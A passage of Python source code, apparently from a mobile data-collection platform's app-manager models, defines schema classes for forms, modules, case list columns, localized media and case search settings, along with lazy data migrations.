case_type,
name,
self.unique_id,
"%s is not a valid question" % question_path
)
def get_all_case_updates(self):
"""
Collate contributed case updates from all sources within the form
Subclass must have helper methods defined:
- get_case_updates
- get_all_contributed_subcase_properties
- get_save_to_case_updates
:return: collated {<case_type>: set([<property>])}
"""
updates_by_case_type = defaultdict(set)
for case_type, updates in self.get_case_updates().items():
updates_by_case_type[case_type].update(updates)
for case_type, updates in self.get_all_contributed_subcase_properties().items():
updates_by_case_type[case_type].update(updates)
for case_type, updates in self.get_save_to_case_updates().items():
updates_by_case_type[case_type].update(updates)
return updates_by_case_type
def get_case_updates_for_case_type(self, case_type):
"""
Like get_case_updates filtered by a single case type
subclass must implement `get_case_updates`
"""
return self.get_case_updates().get(case_type, [])
class JRResourceProperty(StringProperty):
def validate(self, value, required=True):
super(JRResourceProperty, self).validate(value, required)
if value is not None and not value.startswith('jr://'):
raise BadValueError("JR Resources must start with 'jr://': {!r}".format(value))
return value
class CustomIcon(DocumentSchema):
"""
A custom icon to display next to a module or a form.
The property "form" identifies what kind of icon this would be, for ex: badge
One can set either a simple text to display or
an xpath expression to be evaluated for example count of cases within.
"""
form = StringProperty()
text = DictProperty(six.text_type)
xpath = StringProperty()
class NavMenuItemMediaMixin(DocumentSchema):
"""
Language-specific icon and audio.
Properties are map of lang-code to filepath
"""
# These were originally DictProperty(JRResourceProperty),
# but jsonobject<0.9.0 didn't properly support passing in a property to a container type
# so it was actually wrapping as a StringPropery
# too late to retroactively apply that validation,
# so now these are DictProperty(StringProperty)
media_image = DictProperty(StringProperty)
media_audio = DictProperty(StringProperty)
custom_icons = ListProperty(CustomIcon)
# When set to true, all languages use the specific media from the default language
use_default_image_for_all = BooleanProperty(default=False)
use_default_audio_for_all = BooleanProperty(default=False)
@classmethod
def wrap(cls, data):
# Lazy migration from single-language media to localizable media
for media_attr in ('media_image', 'media_audio'):
old_media = data.get(media_attr, None)
if old_media:
# Single-language media was stored in a plain string.
# Convert this to a dict, using a dummy key because we
# don't know the app's supported or default lang yet.
if isinstance(old_media, six.string_types):
soft_assert_type_text(old_media)
new_media = {'default': old_media}
data[media_attr] = new_media
elif isinstance(old_media, dict):
# Once the media has localized data, discard the dummy key
if 'default' in old_media and len(old_media) > 1:
old_media.pop('default')
return super(NavMenuItemMediaMixin, cls).wrap(data)
def get_app(self):
raise NotImplementedError
def _get_media_by_language(self, media_attr, lang, strict=False):
"""
Return media-path for given language if one exists, else 1st path in the
sorted lang->media-path list
*args:
media_attr: one of 'media_image' or 'media_audio'
lang: language code
**kwargs:
strict: whether to return None if media-path is not set for lang or
to return first path in sorted lang->media-path list
"""
assert media_attr in ('media_image', 'media_audio')
app = self.get_app()
if ((self.use_default_image_for_all and media_attr == 'media_image')
or (self.use_default_audio_for_all and media_attr == 'media_audio')):
lang = app.default_language
media_dict = getattr(self, media_attr)
if not media_dict:
return None
if media_dict.get(lang, ''):
return media_dict[lang]
if not strict:
# if the queried lang key doesn't exist,
# return the first in the sorted list
for lang, item in sorted(media_dict.items()):
return item
@property
def default_media_image(self):
# For older apps that were migrated: just return the first available item
self._assert_unexpected_default_media_call('media_image')
return self.icon_by_language('')
@property
def default_media_audio(self):
# For older apps that were migrated: just return the first available item
self._assert_unexpected_default_media_call('media_audio')
return self.audio_by_language('')
def _assert_unexpected_default_media_call(self, media_attr):
assert media_attr in ('media_image', 'media_audio')
media = getattr(self, media_attr)
if isinstance(media, dict) and list(media) == ['default']:
from corehq.util.view_utils import get_request
request = get_request()
url = ''
if request:
url = request.META.get('HTTP_REFERER')
_assert = soft_assert(['jschweers' + '@' + 'dimagi.com'])
_assert(False, 'Called default_media_image on app with localized media: {}'.format(url))
def icon_by_language(self, lang, strict=False):
return self._get_media_by_language('media_image', lang, strict=strict)
def audio_by_language(self, lang, strict=False):
return self._get_media_by_language('media_audio', lang, strict=strict)
def custom_icon_form_and_text_by_language(self, lang):
custom_icon = self.custom_icon
if custom_icon:
custom_icon_text = custom_icon.text.get(lang, custom_icon.text.get(self.get_app().default_language))
return custom_icon.form, custom_icon_text
return None, None
def _set_media(self, media_attr, lang, media_path):
"""
Caller's responsibility to save doc.
Currently only called from the view which saves after all Edits
"""
assert media_attr in ('media_image', 'media_audio')
media_dict = getattr(self, media_attr) or {}
old_value = media_dict.get(lang)
media_dict[lang] = media_path or ''
setattr(self, media_attr, media_dict)
# remove the entry from app multimedia mappings if media is being removed now
# This does not remove the multimedia but just it's reference in mapping
# Added it here to ensure it's always set instead of getting it only when needed
app = self.get_app()
if old_value and not media_path:
# expire all_media_paths before checking for media path used in Application
app.all_media.reset_cache(app)
app.all_media_paths.reset_cache(app)
if old_value not in app.all_media_paths():
app.multimedia_map.pop(old_value, None)
def set_icon(self, lang, icon_path):
self._set_media('media_image', lang, icon_path)
def set_audio(self, lang, audio_path):
self._set_media('media_audio', lang, audio_path)
def _all_media_paths(self, media_attr, lang=None):
assert media_attr in ('media_image', 'media_audio')
media_dict = getattr(self, media_attr) or {}
valid_media_paths = set()
for key, value in media_dict.items():
if value and (lang is None or key == lang):
valid_media_paths.add(value)
return valid_media_paths
def all_image_paths(self, lang=None):
return self._all_media_paths('media_image', lang=lang)
def all_audio_paths(self, lang=None):
return self._all_media_paths('media_audio', lang=lang)
def icon_app_string(self, lang, for_default=False):
"""
Return lang/app_strings.txt translation for given lang
if a path exists for the lang
**kwargs:
for_default: whether app_string is for default/app_strings.txt
"""
if not for_default and self.icon_by_language(lang, strict=True):
return self.icon_by_language(lang, strict=True)
if for_default:
return self.icon_by_language(lang, strict=False)
def audio_app_string(self, lang, for_default=False):
"""
see note on self.icon_app_string
"""
if not for_default and self.audio_by_language(lang, strict=True):
return self.audio_by_language(lang, strict=True)
if for_default:
return self.audio_by_language(lang, strict=False)
@property
def custom_icon(self):
if self.custom_icons:
return self.custom_icons[0]
class Form(IndexedFormBase, FormMediaMixin, NavMenuItemMediaMixin):
form_type = 'module_form'
form_filter = StringProperty()
requires = StringProperty(choices=["case", "referral", "none"], default="none")
actions = SchemaProperty(FormActions)
@classmethod
def wrap(cls, data):
# rare schema bug: http://manage.dimagi.com/default.asp?239236
if data.get('case_references') == []:
del data['case_references']
return super(Form, cls).wrap(data)
def add_stuff_to_xform(self, xform, build_profile_id=None):
super(Form, self).add_stuff_to_xform(xform, build_profile_id)
xform.add_case_and_meta(self)
def all_other_forms_require_a_case(self):
m = self.get_module()
return all([form.requires == 'case' for form in m.get_forms() if form.id != self.id])
def session_var_for_action(self, action):
module_case_type = self.get_module().case_type
if action == 'open_case':
return 'case_id_new_{}_0'.format(module_case_type)
if isinstance(action, OpenSubCaseAction):
subcase_type = action.case_type
subcase_index = self.actions.subcases.index(action)
opens_case = 'open_case' in self.active_actions()
if opens_case:
subcase_index += 1
return 'case_id_new_{}_{}'.format(subcase_type, subcase_index)
def _get_active_actions(self, types):
actions = {}
for action_type in types:
getter = 'get_{}'.format(action_type)
if hasattr(self.actions, getter):
# user getter if there is one
a = list(getattr(self.actions, getter)())
else:
a = getattr(self.actions, action_type)
if isinstance(a, list):
if a:
actions[action_type] = a
elif a.is_active():
actions[action_type] = a
return actions
@memoized
def get_action_type(self):
if self.actions.close_case.condition.is_active():
return 'close'
elif (self.actions.open_case.condition.is_active() or
self.actions.subcases):
return 'open'
elif self.actions.update_case.condition.is_active():
return 'update'
else:
return 'none'
@memoized
def get_icon_help_text(self):
messages = []
if self.actions.open_case.condition.is_active():
messages.append(_('This form opens a {}').format(self.get_module().case_type))
if self.actions.subcases:
messages.append(_('This form opens a subcase {}').format(', '.join(self.get_subcase_types())))
if self.actions.close_case.condition.is_active():
messages.append(_('This form closes a {}').format(self.get_module().case_type))
elif self.requires_case():
messages.append(_('This form updates a {}').format(self.get_module().case_type))
return '. '.join(messages)
def active_actions(self):
self.get_app().assert_app_v2()
if self.requires == 'none':
action_types = (
'open_case', 'update_case', 'close_case', 'subcases',
'usercase_update', 'usercase_preload',
)
elif self.requires == 'case':
action_types = (
'update_case', 'close_case', 'case_preload', 'subcases',
'usercase_update', 'usercase_preload', 'load_from_form',
)
else:
# this is left around for legacy migrated apps
action_types = (
'open_case', 'update_case', 'close_case',
'case_preload', 'subcases',
'usercase_update', 'usercase_preload',
)
return self._get_active_actions(action_types)
def active_non_preloader_actions(self):
return self._get_active_actions((
'open_case', 'update_case', 'close_case',
'open_referral', 'update_referral', 'close_referral'))
@property
def validator(self):
return FormValidator(self)
def requires_case(self):
# all referrals also require cases
return self.requires in ("case", "referral")
def requires_case_type(self):
return self.requires_case() or \
bool(self.active_non_preloader_actions())
def requires_referral(self):
return self.requires == "referral"
def uses_parent_case(self):
"""
Returns True if any of the load/update properties references the
parent case; False otherwise
"""
return any([name.startswith('parent/')
for name in self.actions.all_property_names()])
def get_registration_actions(self, case_type):
"""
:return: List of actions that create a case. Subcase actions are included
as long as they are not inside a repeat. If case_type is not None
only return actions that create a case of the specified type.
"""
reg_actions = []
if 'open_case' in self.active_actions() and (not case_type or self.get_module().case_type == case_type):
reg_actions.append('open_case')
subcase_actions = [action for action in self.actions.subcases if not action.repeat_context]
if case_type:
subcase_actions = [a for a in subcase_actions if a.case_type == case_type]
reg_actions.extend(subcase_actions)
return reg_actions
def is_registration_form(self, case_type=None):
reg_actions = self.get_registration_actions(case_type)
return len(reg_actions) == 1
def uses_usercase(self):
return actions_use_usercase(self.active_actions())
def get_case_updates(self):
# This method is used by both get_all_case_properties and
# get_usercase_properties. In the case of usercase properties, use
# the usercase_update action, and for normal cases, use the
# update_case action
case_type = self.get_module().case_type
format_key = self.get_case_property_name_formatter()
return {
case_type: {
format_key(*item) for item in self.actions.update_case.update.items()},
USERCASE_TYPE: {
format_key(*item) for item in self.actions.usercase_update.update.items()}
}
@memoized
def get_subcase_types(self):
'''
Return a list of each case type for which this Form opens a new subcase.
:return:
'''
return {subcase.case_type for subcase in self.actions.subcases
if subcase.close_condition.type == "never" and subcase.case_type}
@property
def case_references(self):
refs = self.case_references_data or CaseReferences()
if not refs.load and self.actions.load_from_form.preload:
# for backward compatibility
# preload only has one reference per question path
preload = self.actions.load_from_form.preload
refs.load = {key: [value] for key, value in six.iteritems(preload)}
return refs
@case_references.setter
def case_references(self, refs):
"""Set case references
format: {"load": {"/data/path": ["case_property", ...], ...}}
"""
self.case_references_data = refs
if self.actions.load_from_form.preload:
self.actions.load_from_form = PreloadAction()
@memoized
def get_all_contributed_subcase_properties(self):
case_properties = defaultdict(set)
for subcase in self.actions.subcases:
case_properties[subcase.case_type].update(list(subcase.case_properties.keys()))
return case_properties
@memoized
def get_contributed_case_relationships(self):
case_relationships_by_child_type = defaultdict(set)
parent_case_type = self.get_module().case_type
for subcase in self.actions.subcases:
child_case_type = subcase.case_type
if child_case_type != parent_case_type and (
self.actions.open_case.is_active() or
self.actions.update_case.is_active() or
self.actions.close_case.is_active()):
case_relationships_by_child_type[child_case_type].add(
(parent_case_type, subcase.reference_id or 'parent'))
return case_relationships_by_child_type
def update_app_case_meta(self, app_case_meta):
from corehq.apps.reports.formdetails.readable import FormQuestionResponse
questions = {
q['value']: FormQuestionResponse(q)
for q in self.get_questions(self.get_app().langs, include_triggers=True,
include_groups=True, include_translations=True)
}
self._add_save_to_case_questions(questions, app_case_meta)
module_case_type = self.get_module().case_type
type_meta = app_case_meta.get_type(module_case_type)
for type_, action in self.active_actions().items():
if type_ == 'open_case':
type_meta.add_opener(self.unique_id, action.condition)
self.add_property_save(
app_case_meta,
module_case_type,
'name',
questions,
action.name_path
)
if type_ == 'close_case':
type_meta.add_closer(self.unique_id, action.condition)
if type_ == 'update_case' or type_ == 'usercase_update':
for name, question_path in FormAction.get_action_properties(action):
self.add_property_save(
app_case_meta,
USERCASE_TYPE if type_ == 'usercase_update' else module_case_type,
name,
questions,
question_path
)
if type_ == 'case_preload' or type_ == 'load_from_form' or type_ == 'usercase_preload':
for name, question_path in FormAction.get_action_properties(action):
self.add_property_load(
app_case_meta,
USERCASE_TYPE if type_ == 'usercase_preload' else module_case_type,
name,
questions,
question_path
)
if type_ == 'subcases':
for act in action:
if act.is_active():
sub_type_meta = app_case_meta.get_type(act.case_type)
sub_type_meta.add_opener(self.unique_id, act.condition)
if act.close_condition.is_active():
sub_type_meta.add_closer(self.unique_id, act.close_condition)
for name, question_path in FormAction.get_action_properties(act):
self.add_property_save(
app_case_meta,
act.case_type,
name,
questions,
question_path
)
def parse_case_type(name, types={"#case": module_case_type,
"#user": USERCASE_TYPE}):
if name.startswith("#") and "/" in name:
full_name = name
hashtag, name = name.split("/", 1)
if hashtag not in types:
hashtag, name = "#case", full_name
else:
hashtag = "#case"
return types[hashtag], name
def parse_relationship(name):
if '/' not in name:
return name
relationship, property_name = name.split('/', 1)
if relationship == 'grandparent':
relationship = 'parent/parent'
return '/'.join([relationship, property_name])
for case_load_reference in self.case_references.get_load_references():
for name in case_load_reference.properties:
case_type, name = parse_case_type(name)
name = parse_relationship(name)
self.add_property_load(
app_case_meta,
case_type,
name,
questions,
case_load_reference.path
)
class MappingItem(DocumentSchema):
key = StringProperty()
# lang => localized string
value = DictProperty()
@property
def treat_as_expression(self):
"""
Returns if whether the key can be treated as a valid expression that can be included in
condition-predicate of an if-clause for e.g. if(<expression>, value, ...)
"""
special_chars = '{}()[]=<>."\'/'
return any(special_char in self.key for special_char in special_chars)
@property
def key_as_variable(self):
"""
Return an xml variable name to represent this key.
If the key contains spaces or a condition-predicate of an if-clause,
return a hash of the key with "h" prepended.
If not, return the key with "k" prepended.
The prepended characters prevent the variable name from starting with a
numeral, which is illegal.
"""
if re.search(r'\W', self.key) or self.treat_as_expression:
return 'h{hash}'.format(hash=hashlib.md5(self.key.encode('UTF-8')).hexdigest()[:8])
else:
return 'k{key}'.format(key=self.key)
def key_as_condition(self, property):
if self.treat_as_expression:
condition = dot_interpolate(self.key, property)
return "{condition}".format(condition=condition)
else:
return "{property} = '{key}'".format(
property=property,
key=self.key
)
def ref_to_key_variable(self, index, sort_or_display):
if sort_or_display == "sort":
key_as_var = "{}, ".format(index)
elif sort_or_display == "display":
key_as_var = "${var_name}, ".format(var_name=self.key_as_variable)
return key_as_var
class GraphAnnotations(IndexedSchema):
display_text = DictProperty()
x = StringProperty()
y = StringProperty()
class GraphSeries(DocumentSchema):
config = DictProperty()
locale_specific_config = DictProperty()
data_path = StringProperty()
x_function = StringProperty()
y_function = StringProperty()
radius_function = StringProperty()
class GraphConfiguration(DocumentSchema):
config = DictProperty()
locale_specific_config = DictProperty()
annotations = SchemaListProperty(GraphAnnotations)
graph_type = StringProperty()
series = SchemaListProperty(GraphSeries)
class DetailTab(IndexedSchema):
"""
Represents a tab in the case detail screen on the phone.
Each tab is itself a detail, nested inside the app's "main" detail.
"""
header = DictProperty()
# The first index, of all fields in the parent detail, that belongs to this tab
starting_index = IntegerProperty()
# A tab may be associated with a nodeset, resulting in a detail that
# iterates through sub-nodes of an entity rather than a single entity
has_nodeset = BooleanProperty(default=False)
nodeset = StringProperty()
relevant = StringProperty()
class DetailColumn(IndexedSchema):
"""
Represents a column in case selection screen on the phone. Ex:
{
'header': {'en': 'Sex', 'por': 'Sexo'},
'model': 'case',
'field': 'sex',
'format': 'enum',
'xpath': '.',
'enum': [
{'key': 'm', 'value': {'en': 'Male', 'por': 'Macho'},
{'key': 'f', 'value': {'en': 'Female', 'por': 'Fêmea'},
],
}
"""
header = DictProperty()
model = StringProperty()
field = StringProperty()
useXpathExpression = BooleanProperty(default=False)
format = StringProperty()
enum = SchemaListProperty(MappingItem)
graph_configuration = SchemaProperty(GraphConfiguration)
case_tile_field = StringProperty()
late_flag = IntegerProperty(default=30)
advanced = StringProperty(default="")
filter_xpath = StringProperty(default="")
time_ago_interval = FloatProperty(default=365.25)
@property
def enum_dict(self):
"""for backwards compatibility with building 1.0 apps"""
import warnings
warnings.warn('You should not use enum_dict. Use enum instead',
DeprecationWarning)
return dict((item.key, item.value) for item in self.enum)
def rename_lang(self, old_lang, new_lang):
for dct in [self.header] + [item.value for item in self.enum]:
_rename_key(dct, old_lang, new_lang)
@property
def field_type(self):
if FIELD_SEPARATOR in self.field:
return self.field.split(FIELD_SEPARATOR, 1)[0]
else:
return 'property' # equivalent to property:parent/case_property
@property
def field_property(self):
if FIELD_SEPARATOR in self.field:
return self.field.split(FIELD_SEPARATOR, 1)[1]
else:
return self.field
class TimeAgoInterval(object):
map = {
'day': 1.0,
'week': 7.0,
'month': 30.4375,
'year': 365.25
}
@classmethod
def get_from_old_format(cls, format):
if format == 'years-ago':
return cls.map['year']
elif format == 'months-ago':
return cls.map['month']
@classmethod
def wrap(cls, data):
if data.get('format') in ('months-ago', 'years-ago'):
data['time_ago_interval'] = cls.TimeAgoInterval.get_from_old_format(data['format'])
data['format'] = 'time-ago'
# Lazy migration: enum used to be a dict, now is a list
if isinstance(data.get('enum'), dict):
data['enum'] = sorted(
[{'key': key, 'value': value} for key, value in data['enum'].items()],
key=lambda d: d['key'],
)
# Lazy migration: xpath expressions from format to first-class property
if data.get('format') == 'calculate':
property_xpath = PropertyXpathGenerator(None, None, None, super(DetailColumn, cls).wrap(data)).xpath
data['field'] = dot_interpolate(data.get('calc_xpath', '.'), property_xpath)
data['useXpathExpression'] = True
data['hasAutocomplete'] = False
data['format'] = 'plain'
return super(DetailColumn, cls).wrap(data)
@classmethod
def from_json(cls, data):
from corehq.apps.app_manager.views.media_utils import interpolate_media_path
to_ret = cls.wrap(data)
if to_ret.format == 'enum-image':
# interpolate icons-paths
for item in to_ret.enum:
for lang, path in six.iteritems(item.value):
item.value[lang] = interpolate_media_path(path)
return to_ret
@property
def invisible(self):
return self.format == 'invisible'
class SortElement(IndexedSchema):
field = StringProperty()
type = StringProperty()
direction = StringProperty()
blanks = StringProperty()
display = DictProperty()
sort_calculation = StringProperty(default="")
def has_display_values(self):
return any(s.strip() != '' for s in self.display.values())
class CaseListLookupMixin(DocumentSchema):
"""
Allows for the addition of Android Callouts to do lookups from the CaseList
<lookup action="" image="" name="">
<extra key="" value="" />
<response key="" />
<field>
<header><text><locale id=""/></text></header>
<template><text><xpath function=""/></text></template>
</field>
</lookup>
"""
lookup_enabled = BooleanProperty(default=False)
lookup_autolaunch = BooleanProperty(default=False)
lookup_action = StringProperty()
lookup_name = StringProperty()
lookup_image = JRResourceProperty(required=False)
lookup_extras = SchemaListProperty()
lookup_responses = SchemaListProperty()
lookup_display_results = BooleanProperty(default=False) # Display callout results in case list?
lookup_field_header = DictProperty()
lookup_field_template = StringProperty()
class Detail(IndexedSchema, CaseListLookupMixin):
"""
Full configuration for a case selection screen
"""
display = StringProperty(choices=['short', 'long'])
columns = SchemaListProperty(DetailColumn)
get_columns = IndexedSchema.Getter('columns')
tabs = SchemaListProperty(DetailTab)
get_tabs = IndexedSchema.Getter('tabs')
sort_elements = SchemaListProperty(SortElement)
sort_nodeset_columns = BooleanProperty()
filter = StringProperty()
# If True, a small tile will display the case name after selection.
persist_case_context = BooleanProperty()
persistent_case_context_xml = StringProperty(default='case_name')
# Custom variables to add into the <variables /> node
custom_variables = StringProperty()
# If True, use case tiles in the case list
use_case_tiles = BooleanProperty()
# If given, use this string for the case tile markup instead of the default temaplte
custom_xml = StringProperty()
persist_tile_on_forms = BooleanProperty()
# use case tile context persisted over forms from another module
persistent_case_tile_from_module = StringProperty()
# If True, the in form tile can be pulled down to reveal all the case details.
pull_down_tile = BooleanProperty()
print_template = DictProperty()
def get_tab_spans(self):
'''
Return the starting and ending indices into self.columns deliminating
the columns that should be in each tab.
:return:
'''
tabs = list(self.get_tabs())
ret = []
for tab in tabs:
try:
end = tabs[tab.id + 1].starting_index
except IndexError:
end = len(self.columns)
ret.append((tab.starting_index, end))
return ret
@parse_int([1])
def get_column(self, i):
return self.columns[i].with_id(i % len(self.columns), self)
def rename_lang(self, old_lang, new_lang):
for column in self.columns:
column.rename_lang(old_lang, new_lang)
def sort_nodeset_columns_for_detail(self):
return (
self.display == "long" and
self.sort_nodeset_columns and
any(tab for tab in self.get_tabs() if tab.has_nodeset)
)
class CaseList(IndexedSchema, NavMenuItemMediaMixin):
label = DictProperty()
show = BooleanProperty(default=False)
def rename_lang(self, old_lang, new_lang):
_rename_key(self.label, old_lang, new_lang)
def get_app(self):
return self._module.get_app()
class CaseSearchProperty(DocumentSchema):
"""
Case properties available to search on.
"""
name = StringProperty()
label = DictProperty()
class DefaultCaseSearchProperty(DocumentSchema):
"""Case Properties with fixed value to search on"""
property = StringProperty()
default_value = StringProperty()
class CaseSearch(DocumentSchema):
"""
Properties and search command label
"""
command_label = DictProperty(default={'en': 'Search All Cases'})
properties = SchemaListProperty(CaseSearchProperty)
relevant = StringProperty(default=CLAIM_DEFAULT_RELEVANT_CONDITION)
search_button_display_condition = StringProperty()
include_closed = BooleanProperty(default=False)
default_properties = SchemaListProperty(DefaultCaseSearchProperty)
blacklisted_owner_ids_expression = StringProperty()
class ParentSelect(DocumentSchema):
active = BooleanProperty(default=False)
relationship = StringProperty(default='parent')
module_id = StringProperty()
class FixtureSelect(DocumentSchema):
"""
Configuration for creating a details screen from a fixture which can be used to pre-filter
cases prior to displaying the case list.
fixture_type: FixtureDataType.tag
display_column: name of the column to display in the list
localize: boolean if display_column actually contains the key for the localized string
variable_column: name of the column whose value should be saved when the user selects an item
xpath: xpath expression to use as the case filter
"""
active = BooleanProperty(default=False)
fixture_type = StringProperty()
display_column = StringProperty()
localize = BooleanProperty(default=False)
variable_column = StringProperty()
xpath = StringProperty(default='')
class DetailPair(DocumentSchema):
short = SchemaProperty(Detail)
long = SchemaProperty(Detail)
@classmethod
def wrap(cls, data):
self = super(DetailPair, cls).wrap(data)
self.short.display = 'short'
self.long.display = 'long'
return self
class CaseListForm(NavMenuItemMediaMixin):
form_id = FormIdProperty('modules[*].case_list_form.form_id')
label = DictProperty()
post_form_workflow = StringProperty(
default=WORKFLOW_DEFAULT,
choices=REGISTRATION_FORM_WORFLOWS,
)
def rename_lang(self, old_lang, new_lang):
_rename_key(self.label, old_lang, new_lang)
def get_app(self):
return self._module.get_app()
class ModuleBase(IndexedSchema, ModuleMediaMixin, NavMenuItemMediaMixin, CommentMixin):
name = DictProperty(six.text_type)
unique_id = StringProperty()
case_type = StringProperty()
case_list_form = SchemaProperty(CaseListForm)
module_filter = StringProperty()
put_in_root = BooleanProperty(default=False)
root_module_id = StringProperty()
fixture_select = SchemaProperty(FixtureSelect)
auto_select_case = BooleanProperty(default=False)
is_training_module = BooleanProperty(default=False)
def __init__(self, *args, **kwargs):
super(ModuleBase, self).__init__(*args, **kwargs)
self.assign_references()
@property
def is_surveys(self):
return self.case_type == ""
def assign_references(self):
if hasattr(self, 'case_list'):
self.case_list._module = self
if hasattr(self, 'case_list_form'):
self.case_list_form._module = self
@classmethod
def wrap(cls, data):
if cls is ModuleBase:
doc_type = data['doc_type']
if doc_type == 'Module':
return Module.wrap(data)
elif doc_type == 'AdvancedModule':
return AdvancedModule.wrap(data)
elif doc_type == 'ReportModule':
return ReportModule.wrap(data)
elif doc_type == 'ShadowModule':
return ShadowModule.wrap(data)
else:
raise ValueError('Unexpected doc_type for Module', doc_type)
else:
return super(ModuleBase, cls).wrap(data)
def get_or_create_unique_id(self):
"""
It is the caller's responsibility to save the Application
after calling this function.
WARNING: If called on the same doc in different requests without saving,
this function will return a different uuid each time,
likely causing unexpected behavior
"""
if not self.unique_id:
self.unique_id = uuid.uuid4().hex
return self.unique_id
get_forms = IndexedSchema.Getter('forms')
def get_suite_forms(self):
return [f for f in self.get_forms() if not f.is_a_disabled_release_form()]
@parse_int([1])
def get_form(self, i):
try:
return self.forms[i].with_id(i % len(self.forms), self)
except IndexError:
raise FormNotFoundException()
def get_form_index(self, unique_id):
for index, form in enumerate(self.get_forms()):
if form.unique_id == unique_id:
return index
error = _("Could not find form with ID='{unique_id}' in module '{module_name}'.").format(
module_name=self.name, unique_id=unique_id)
raise FormNotFoundException(error)
def get_child_modules(self):
return [
module for module in self.get_app().get_modules()
if module.unique_id != self.unique_id and getattr(module, 'root_module_id', None) == self.unique_id
]
@property
def root_module(self):
if self.root_module_id:
return self._parent.get_module_by_unique_id(self.root_module_id,
error=_("Could not find parent menu for '{}'").format(self.default_name()))
def requires_case_details(self):
return False
def root_requires_same_case(self):
return self.root_module \
and self.root_module.case_type == self.case_type \
and self.root_module.all_forms_require_a_case()
def get_case_types(self):
return set([self.case_type])
def get_app(self):
return self._parent
def default_name(self, app=None):
if not app:
app = self.get_app()
return trans(
self.name,
[app.default_language] + app.langs,
include_lang=False
)
def rename_lang(self, old_lang, new_lang):
_rename_key(self.name, old_lang, new_lang)
for form in self.get_forms():
form.rename_lang(old_lang, new_lang)
for _, detail, _ in self.get_details():
detail.rename_lang(old_lang, new_lang)
def get_form_by_unique_id(self, unique_id):
for form in self.get_forms():
if form.get_unique_id() == unique_id:
return form
@property
def validator(self):
return ModuleBaseValidator(self)
def validate_for_build(self):
return self.validator.validate_for_build()
@memoized
def get_subcase_types(self):
'''
Return a set of each case type for which this module has a form that
opens a new subcase of that type.
'''
subcase_types = set()
for form in self.get_forms():
if hasattr(form, 'get_subcase_types'):
subcase_types.update(form.get_subcase_types())
return subcase_types
def get_custom_entries(self):
"""
By default, suite entries are configured by forms, but you can also provide custom
entries by overriding this function.
See ReportModule for an example
"""
return []
def uses_media(self):
"""
Whether the module uses media. If this returns false then media will not be generated
for the module.
"""
return True
def uses_usercase(self):
return False
def add_insert_form(self, from_module, form, index=None, with_source=False):
raise IncompatibleFormTypeException()
def update_app_case_meta(self, app_case_meta):
pass
class ModuleDetailsMixin(object):
@classmethod
def wrap_details(cls, data):
if 'details' in data:
try:
case_short, case_long, ref_short, ref_long = data['details']
except ValueError:
# "need more than 0 values to unpack"
pass
else:
data['case_details'] = {
'short': case_short,
'long': case_long,
}
data['ref_details'] = {
'short': ref_short,
'long': ref_long,
}
finally:
del data['details']
return data
@property
def case_list_filter(self):
try:
return self.case_details.short.filter
except AttributeError:
return None
@property
def detail_sort_elements(self):
try:
return self.case_details.short.sort_elements
except Exception:
return []
@property
def search_detail(self):
return deepcopy(self.case_details.short)
def rename_lang(self, old_lang, new_lang):
super(Module, self).rename_lang(old_lang, new_lang)
for case_list in (self.case_list, self.referral_list):
case_list.rename_lang(old_lang, new_lang)
def export_json(self, dump_json=True, keep_unique_id=False):
source = self.to_json()
if not keep_unique_id:
for form in source['forms']:
del form['unique_id']
return json.dumps(source) if dump_json else source
def get_details(self):
details = [
('case_short', self.case_details.short, True),
('case_long', self.case_details.long, True),
('ref_short', self.ref_details.short, False),
('ref_long', self.ref_details.long, False),
]
if module_offers_search(self) and not self.case_details.short.custom_xml:
details.append(('search_short', self.search_detail, True))
return tuple(details)
class Module(ModuleBase, ModuleDetailsMixin):
"""
A group of related forms, and configuration that applies to them all.
Translates to a top-level menu on the phone.
"""
module_type = 'basic'
forms = SchemaListProperty(Form)
case_details = SchemaProperty(DetailPair)
ref_details = SchemaProperty(DetailPair)
case_list = SchemaProperty(CaseList)
referral_list = SchemaProperty(CaseList)
task_list = SchemaProperty(CaseList)
parent_select = SchemaProperty(ParentSelect)
search_config = SchemaProperty(CaseSearch)
display_style = StringProperty(default='list')
@classmethod
def wrap(cls, data):
data = cls.wrap_details(data)
return super(Module, cls).wrap(data)
@classmethod
def new_module(cls, name, lang):
detail = Detail(
columns=[DetailColumn(
format='plain',
header={(lang or 'en'): ugettext("Name")},
field='name',
model='case',
hasAutocomplete=True,
)]
)
module = cls(
name={(lang or 'en'): name or ugettext("Untitled Module")},
forms=[],
case_type='',
case_details=DetailPair(
short=Detail(detail.to_json()),
long=Detail(detail.to_json()),
),
)
module.get_or_create_unique_id()
return module
@classmethod
def new_training_module(cls, name, lang):
module = cls.new_module(name, lang)
module.is_training_module = True
return module
def new_form(self, name, lang, attachment=Ellipsis):
from corehq.apps.app_manager.views.utils import get_blank_form_xml
lang = lang if lang else "en"
name = name if name else _("Untitled Form")
form = Form(
name={lang: name},
)
self.forms.append(form)
form = self.get_form(-1)
if attachment == Ellipsis:
attachment = get_blank_form_xml(name)
form.source = attachment
return form
def add_insert_form(self, from_module, form, index=None, with_source=False):
if isinstance(form, Form):
new_form = form
elif isinstance(form, AdvancedForm) and not len(list(form.actions.get_all_actions())):
new_form = Form(
name=form.name,
form_filter=form.form_filter,
media_image=form.media_image,
media_audio=form.media_audio
)
new_form._parent = self
form._parent = self
if with_source:
new_form.source = form.source
else:
raise IncompatibleFormTypeException(_('''
Cannot move an advanced form with actions into a basic menu.
'''))
if index is not None:
self.forms.insert(index, new_form)
else:
self.forms.append(new_form)
return self.get_form(index or -1)
@property
def validator(self):
return ModuleValidator(self)
def requires(self):
r = set(["none"])
for form in self.get_forms():
r.add(form.requires)
if self.case_list.show:
r.add('case')
if self.referral_list.show:
r.add('referral')
for val in ("referral", "case", "none"):
if val in r:
return val
def requires_case_details(self):
ret = False
if self.case_list.show:
return True
for form in self.get_forms():
if form.requires_case():
ret = True
break
return ret
@memoized
def all_forms_require_a_case(self):
return all([form.requires == 'case' for form in self.get_forms()])
def uses_usercase(self):
"""Return True if this module has any forms that use the usercase.
"""
return any(form.uses_usercase() for form in self.get_forms())
def grid_display_style(self):
return self.display_style == 'grid'
def update_app_case_meta(self, meta):
from corehq.apps.reports.formdetails.readable import CaseMetaException
for column in self.case_details.long.columns:
try:
meta.add_property_detail('long', self.case_type, self.unique_id, column)
except CaseMetaException:
pass
for column in self.case_details.short.columns:
try:
meta.add_property_detail('short', self.case_type, self.unique_id, column)
except CaseMetaException:
pass
class AdvancedForm(IndexedFormBase, FormMediaMixin, NavMenuItemMediaMixin):
form_type = 'advanced_form'
form_filter = StringProperty()
actions = SchemaProperty(AdvancedFormActions)
schedule = SchemaProperty(FormSchedule, default=None)
